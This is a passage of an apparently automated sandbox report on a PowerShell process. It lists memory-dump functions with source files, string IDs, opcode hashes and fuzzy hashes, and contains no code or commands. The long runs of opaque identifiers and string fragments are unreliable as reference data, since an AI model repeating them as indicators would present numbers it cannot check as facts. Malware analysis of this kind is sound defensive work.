                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              • Opcode ID: cb1367e4e5be257ef280d7b6dafb292b7eedca4d0107b01420aa697211e5d8c6
                                                                                                                                              • Instruction ID: 9d6ecfc4ff88384a54cb32e01fa103c7fef1e2e2c96f4750423e69a05b029f9e
                                                                                                                                              • Opcode Fuzzy Hash: cb1367e4e5be257ef280d7b6dafb292b7eedca4d0107b01420aa697211e5d8c6
                                                                                                                                              • Instruction Fuzzy Hash: 93710474D05228CFDB04CFAAD5047EEBBF5BF89301F54902AD416BB280D778498ACB69
                                                                                                                                              Function 077F9BC8 Relevance: .3, Instructions: 300COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 494e80cc370caa58750627c31dd71da3f1b7e14f3734f67834eba87cf4753d7f
                                                                                                                                              • Instruction ID: e108391909c4b44e2e5bd71a4e906e2127209bb19ffc678a387ee4b285cba7a6
                                                                                                                                              • Opcode Fuzzy Hash: 494e80cc370caa58750627c31dd71da3f1b7e14f3734f67834eba87cf4753d7f
                                                                                                                                              • Instruction Fuzzy Hash: F9D146B4A05218CFDB14CFA9D958BADBBF2FF49340F10816AD609AB391CB746985CF05
                                                                                                                                              Function 077F9BB9 Relevance: .3, Instructions: 293COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 44d06c78df83cb6e202c14e7796c9116ee2c812f36e210047b2650fc7a185f7f
                                                                                                                                              • Instruction ID: d653a49a5933d8df0b9fcad74d568d32b30a5a8cc9f07e2d88ac84aadc1ea111
                                                                                                                                              • Opcode Fuzzy Hash: 44d06c78df83cb6e202c14e7796c9116ee2c812f36e210047b2650fc7a185f7f
                                                                                                                                              • Instruction Fuzzy Hash: 55D147B4A01218CFDB14CFA8D958BADBBF2FF49340F10856AD609AB391DB346985CF05
                                                                                                                                              Function 0752D218 Relevance: .3, Instructions: 280COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2719835908.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7520000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 501b3c6e6925f539bc0a36a529e16c1de816c6b9fbc9a2bcb15599ef529d0064
                                                                                                                                              • Instruction ID: 6e7e63e67104b5d6f4fc7fd7a42b00ce544f796737156ca4969a4cc4c8bcc4db
                                                                                                                                              • Opcode Fuzzy Hash: 501b3c6e6925f539bc0a36a529e16c1de816c6b9fbc9a2bcb15599ef529d0064
                                                                                                                                              • Instruction Fuzzy Hash: 95B169B2F0466A8BCB14CBA8D9806EDFBF1BB89304F248669D455E7241D774ED42CB90
                                                                                                                                              Function 0752D1F9 Relevance: .2, Instructions: 204COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2719835908.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7520000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c3666cdf6f426a5f54e640fd0a54dd29b2e03c52c4900626d7f7d2853c8a8d4d
                                                                                                                                              • Instruction ID: f5801cbf9f4a621cd75c496912f9e7a907bebf095e86f402227377e22f49fa84
                                                                                                                                              • Opcode Fuzzy Hash: c3666cdf6f426a5f54e640fd0a54dd29b2e03c52c4900626d7f7d2853c8a8d4d
                                                                                                                                              • Instruction Fuzzy Hash: EA816AB2F0462A8BDB14CBA9C8806EEFBF1FF89304F148569D455EB241D374E946CB90
                                                                                                                                              Function 077FE800 Relevance: .1, Instructions: 115COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ddc70ee6b0cbc11696766031c92ae224506f9007a708a5b3234deecd5f7b4308
                                                                                                                                              • Instruction ID: 21c4b45a849cc3409014601b78c139148b33b014947bfbee8f287c1b13f23c54
                                                                                                                                              • Opcode Fuzzy Hash: ddc70ee6b0cbc11696766031c92ae224506f9007a708a5b3234deecd5f7b4308
                                                                                                                                              • Instruction Fuzzy Hash: 4A41F3B0D06218CBEB54CF9ADA44BDDBBF2BB89314F14916AD508AB360D7B40989CF11
                                                                                                                                              Function 077FE7F0 Relevance: .1, Instructions: 105COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2721872316.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_77f0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7d28dd8b254f862231583661a2f5b63429eef2d4a88d83efcbed8a0f3b292606
                                                                                                                                              • Instruction ID: 8cb555155238ee5aa0fdc9faebf3d52df68d298ab0bef861977999459cf6e1c3
                                                                                                                                              • Opcode Fuzzy Hash: 7d28dd8b254f862231583661a2f5b63429eef2d4a88d83efcbed8a0f3b292606
                                                                                                                                              • Instruction Fuzzy Hash: B24115B1E01258CBEB54CFAAD944BDDBBF2BB89300F14D16AD508AB364D7B40989CF51
                                                                                                                                              Function 03425A30 Relevance: .1, Instructions: 104COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ac1cca49cf835d0b39590e2f152e8b99bf993905402cfdd3f6061a1f3a8b9b8d
                                                                                                                                              • Instruction ID: dbb4937a17885217f9df417a5c8500780e3a2f9430b90d7872abc2b72dbbfd4e
                                                                                                                                              • Opcode Fuzzy Hash: ac1cca49cf835d0b39590e2f152e8b99bf993905402cfdd3f6061a1f3a8b9b8d
                                                                                                                                              • Instruction Fuzzy Hash: 00418770D156288BEB28DF1AD94879EFBF6BF89304F54C1AAD41CBA264DB740985CF00
                                                                                                                                              Function 03425A20 Relevance: .1, Instructions: 73COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2681477869.0000000003420000.00000040.00000800.00020000.00000000.sdmp, Offset: 03420000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_3420000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b4270163418c7daf16541361d39e961d5878471f31129950c20b6884255057f5
                                                                                                                                              • Instruction ID: 330b27b44a3eeebb70049f7e7f1b0eff8877ea2222f9ec52f54f58bbe8cc8b60
                                                                                                                                              • Opcode Fuzzy Hash: b4270163418c7daf16541361d39e961d5878471f31129950c20b6884255057f5
                                                                                                                                              • Instruction Fuzzy Hash: DB317AB1D016188BEB68CF6BDD5579EFAF3BFC4304F54C1AAD418AA265DB7406868F00
                                                                                                                                              Function 07BF2CE0 Relevance: 9.2, Strings: 7, Instructions: 488COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-3199432138
                                                                                                                                              • Opcode ID: acf8b6f9ff3511429a8a5ffab9d74441cb4b847b97a51b29f77f57de9bd0c91c
                                                                                                                                              • Instruction ID: 6ca979908ed68ca0700ca63e3803b163cd2065b22a1b23769b064d3fa956cd74
                                                                                                                                              • Opcode Fuzzy Hash: acf8b6f9ff3511429a8a5ffab9d74441cb4b847b97a51b29f77f57de9bd0c91c
                                                                                                                                              • Instruction Fuzzy Hash: 53E15AF1B042059FE7144A7898007AEBBE6EFD2A10F1484ABDA05CF396DA31C94DC7E1
                                                                                                                                              Function 07BF2718 Relevance: 7.8, Strings: 6, Instructions: 300COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$x.~h$-~h
                                                                                                                                              • API String ID: 0-3505677895
                                                                                                                                              • Opcode ID: 230a47b7fed2a78bcbd4f24dbac3770a18741464a4b16e8cfb16a60c27daa168
                                                                                                                                              • Instruction ID: dec6294942f76f9665aa1747b3d820ae09bb7634d800dcb557007dd0aea6e4c4
                                                                                                                                              • Opcode Fuzzy Hash: 230a47b7fed2a78bcbd4f24dbac3770a18741464a4b16e8cfb16a60c27daa168
                                                                                                                                              • Instruction Fuzzy Hash: ACC1AFB4B002089FDB14DB68C554B9EBBB3FF88714F148468E5016F395CB76DD898BA1
                                                                                                                                              Function 077548AF Relevance: 7.8, Strings: 6, Instructions: 279COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2720857155.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7750000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$x.~h$-~h
                                                                                                                                              • API String ID: 0-3505677895
                                                                                                                                              • Opcode ID: 3e56e7324030908416d49a411d1d9e43e003c5e5b181f7dacd79199ae2cfbc38
                                                                                                                                              • Instruction ID: a5d942f42f05dd206e32f931e66188aff52c416f5a39f76fe81b1ecc8dbcffaf
                                                                                                                                              • Opcode Fuzzy Hash: 3e56e7324030908416d49a411d1d9e43e003c5e5b181f7dacd79199ae2cfbc38
                                                                                                                                              • Instruction Fuzzy Hash: 35C17DB4B002199FDB64DB14C944B9ABBB2FB85304F5085D8DA08AF355CB71AEC5CF91
                                                                                                                                              Function 07BF66C2 Relevance: 6.4, Strings: 5, Instructions: 139COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2825857601
                                                                                                                                              • Opcode ID: 9a81555720933af20e42c26168565d64261a17d7262a94bb767f446f3bf98742
                                                                                                                                              • Instruction ID: 6770bd5281cc46d7bb8b25c1dd8ed57ca4d50b9562bf56514d93ceea476f6fb9
                                                                                                                                              • Opcode Fuzzy Hash: 9a81555720933af20e42c26168565d64261a17d7262a94bb767f446f3bf98742
                                                                                                                                              • Instruction Fuzzy Hash: FD5181F0A0020ADFEB29CF14C5487A677B1EF46A19F1485EAEE148B191D735D98CCBA1
                                                                                                                                              Function 07BFA958 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2825857601
                                                                                                                                              • Opcode ID: 136fc02efc121e6e094a90274a02a0ff945b7f0e64ead0aedc6b468ba93a084d
                                                                                                                                              • Instruction ID: 9d440aca1d091667b8fd5bbaf45fcc19c542ed741b7d5ec4c38a6c2bc22aafdb
                                                                                                                                              • Opcode Fuzzy Hash: 136fc02efc121e6e094a90274a02a0ff945b7f0e64ead0aedc6b468ba93a084d
                                                                                                                                              • Instruction Fuzzy Hash: D54183F0A15206DFEB2C8E14CA447657BA6EF43A10F05C0EADA098B251D735D98DCB91
                                                                                                                                              Function 07BFC618 Relevance: 6.4, Strings: 5, Instructions: 112COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$TQcq$TQcq$tP^q
                                                                                                                                              • API String ID: 0-3549194529
                                                                                                                                              • Opcode ID: 7e703636ca2871af26f0fa9b7e45c8f344119a6c4f9b3aa6c5aaf8c8747a17e0
                                                                                                                                              • Instruction ID: b6343b6d88e1e97f9f605331d943c261bad9df8b3a22ee62fca5cf3b6eead654
                                                                                                                                              • Opcode Fuzzy Hash: 7e703636ca2871af26f0fa9b7e45c8f344119a6c4f9b3aa6c5aaf8c8747a17e0
                                                                                                                                              • Instruction Fuzzy Hash: 894181F1A0420EDBEB248E15C544B66BFA2FF45B51F1894DADA019F294C771D8C8CBB1
                                                                                                                                              Function 07BF5720 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2825857601
                                                                                                                                              • Opcode ID: 73aeaf0e9b6a28cbe7669d2a0152c7383fd52ba8595a4c90c35b92119d8db8df
                                                                                                                                              • Instruction ID: 8e6c6b29e5802c333268dc513c3b67bbebc359df064dfdbfb165a3ec5c23132b
                                                                                                                                              • Opcode Fuzzy Hash: 73aeaf0e9b6a28cbe7669d2a0152c7383fd52ba8595a4c90c35b92119d8db8df
                                                                                                                                              • Instruction Fuzzy Hash: 97416CF0A1020ADFFF38CE15C548BA977A1EF41B21F1884E6E6048B190D734DAACCB91
                                                                                                                                              Function 07BF872A Relevance: 6.4, Strings: 5, Instructions: 103COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2825857601
                                                                                                                                              • Opcode ID: 438bb8c7cbe042835b022688e9da3e5a487168431caea97c7909e540a33b64d6
                                                                                                                                              • Instruction ID: 97b7796b3e2c4c8b5de54093b8db1ccaf2fde66aadc76f8e14da9a61832b9133
                                                                                                                                              • Opcode Fuzzy Hash: 438bb8c7cbe042835b022688e9da3e5a487168431caea97c7909e540a33b64d6
                                                                                                                                              • Instruction Fuzzy Hash: D331DEF1A0430ADFFB248E55C948BA577B5EF41F10F2880EADA05AB251DB35C98CCB61
                                                                                                                                              Function 07BF7388 Relevance: 5.3, Strings: 4, Instructions: 325COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                              • API String ID: 0-3859475322
                                                                                                                                              • Opcode ID: 8a3ef43b98fe04e246b8a27de4eb668f2ee1b0da2dee6544e9c228b72aee1b96
                                                                                                                                              • Instruction ID: 4c930741d8b662ba6eb5c3a9eb542b1116bb6d96dd802c229ca122b9423c7cb3
                                                                                                                                              • Opcode Fuzzy Hash: 8a3ef43b98fe04e246b8a27de4eb668f2ee1b0da2dee6544e9c228b72aee1b96
                                                                                                                                              • Instruction Fuzzy Hash: 05A18BF1B002059FEB119F28980066ABBE2EF85A10F9484EAD645DF391DE31DC4EC7A1
                                                                                                                                              Function 07BF26FB Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$x.~h$-~h
                                                                                                                                              • API String ID: 0-785572776
                                                                                                                                              • Opcode ID: ca9fb16e7c45e915b9303ce2e271b0122b033a7fc9db2f5b3cb32104e211395b
                                                                                                                                              • Instruction ID: c514c395e3f7be9931fd577f117cac70cb119bfbb9b43347ed15b382e96ccfa8
                                                                                                                                              • Opcode Fuzzy Hash: ca9fb16e7c45e915b9303ce2e271b0122b033a7fc9db2f5b3cb32104e211395b
                                                                                                                                              • Instruction Fuzzy Hash: E1918CB4A002059FDB14CB58C554BDEBBB2FF88714F14C069E5056F3A5CB36EC898BA1
                                                                                                                                              Function 07BFCFA0 Relevance: 5.2, Strings: 4, Instructions: 215COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                              • API String ID: 0-3859475322
                                                                                                                                              • Opcode ID: 1ea43e1d2f08a206658a9ebaf1738d43b0a947b86ade6b44f0b4f6ee91d570fd
                                                                                                                                              • Instruction ID: 640639e8d7b59bd22826ee2fa51a24679ca785081c8a3010f8f70c7583dbf631
                                                                                                                                              • Opcode Fuzzy Hash: 1ea43e1d2f08a206658a9ebaf1738d43b0a947b86ade6b44f0b4f6ee91d570fd
                                                                                                                                              • Instruction Fuzzy Hash: D6614BF1B042058FE7149B799860666FBA6EFD1A10F1884BBD6058F355DA32DC4EC3A1
                                                                                                                                              Function 07BFA690 Relevance: 5.2, Strings: 4, Instructions: 204COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                              • API String ID: 0-3859475322
                                                                                                                                              • Opcode ID: 72af8db081cb8914c3d58bcabf6905d33ee480762bc41ef076d726d1a1baacee
                                                                                                                                              • Instruction ID: ffc45437f05c662ce4f76aee28a48fb13dfab851add1057c5e94f67dfa2bd721
                                                                                                                                              • Opcode Fuzzy Hash: 72af8db081cb8914c3d58bcabf6905d33ee480762bc41ef076d726d1a1baacee
                                                                                                                                              • Instruction Fuzzy Hash: 8761F9B0B401099FEB1C9F69C448B6AB7E2EF89B10F14C4A9D6099F354DB71DC4AC791
                                                                                                                                              Function 07BFD2FD Relevance: 5.1, Strings: 4, Instructions: 123COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q$(o^q$4'^q$tP^q
                                                                                                                                              • API String ID: 0-1804823154
                                                                                                                                              • Opcode ID: 786e3495294f238ba7ebf0ad5a343bb816c408f7f39df8b26709055e4ae5fa3a
                                                                                                                                              • Instruction ID: 0379aea3b37251e395a53c7d461096eae4ccd2ad95ba694621fdb7b90114895b
                                                                                                                                              • Opcode Fuzzy Hash: 786e3495294f238ba7ebf0ad5a343bb816c408f7f39df8b26709055e4ae5fa3a
                                                                                                                                              • Instruction Fuzzy Hash: 204129B0B052458FEB219B588554B66BFA1EF82B10F5884EADA049F256C731EC4DC7A1
                                                                                                                                              Function 07BF5C48 Relevance: 5.1, Strings: 4, Instructions: 116COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o^q$(o^q$tP^q$$^q
                                                                                                                                              • API String ID: 0-1137240099
                                                                                                                                              • Opcode ID: a5ee6480b47ca690f68b4c2c856e05913b98f9ab88593eb2b8c572ab168e723c
                                                                                                                                              • Instruction ID: 2e5b37ae2a7a1842237379c0087bf3d9e0ea4dcc78a68b849d416faf4ef61789
                                                                                                                                              • Opcode Fuzzy Hash: a5ee6480b47ca690f68b4c2c856e05913b98f9ab88593eb2b8c572ab168e723c
                                                                                                                                              • Instruction Fuzzy Hash: AD412AB1E012059FEB348F58C958F66BFE1EF85B10F1884AAEA149F255C731DC58CBA1
                                                                                                                                              Function 07BF3C68 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                              • Opcode ID: d97b2e2ee937a4e8561d89369725536659a368715336d4c843880280e08a18d0
                                                                                                                                              • Instruction ID: e54f5c939ca6921153e3c7c4341b7f26a6d97daa5bb3dfc6ffa42395269f8171
                                                                                                                                              • Opcode Fuzzy Hash: d97b2e2ee937a4e8561d89369725536659a368715336d4c843880280e08a18d0
                                                                                                                                              • Instruction Fuzzy Hash: 992107F570430A5BFB24597A9804B27B6DA9BC0F11F24846AEB09CF385DD32D8498261
                                                                                                                                              Function 07BF0309 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000006.00000002.2724313429.0000000007BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_6_2_7bf0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                              • Opcode ID: 01b1c5ade032e3fdf89915ded82b991bec3d15b92d2c3c8faf54a1903741ecbe
                                                                                                                                              • Instruction ID: 4a6310e8602fe40c8bb2b21c9a3368b8e8d4f5827714fcb04510c8d7dbf0c248
                                                                                                                                              • Opcode Fuzzy Hash: 01b1c5ade032e3fdf89915ded82b991bec3d15b92d2c3c8faf54a1903741ecbe
                                                                                                                                              • Instruction Fuzzy Hash: 9E01F9A6B0D3868FD72B262814242646FF29FC7D2076A45DBC181CF3ABCD158C4D83A7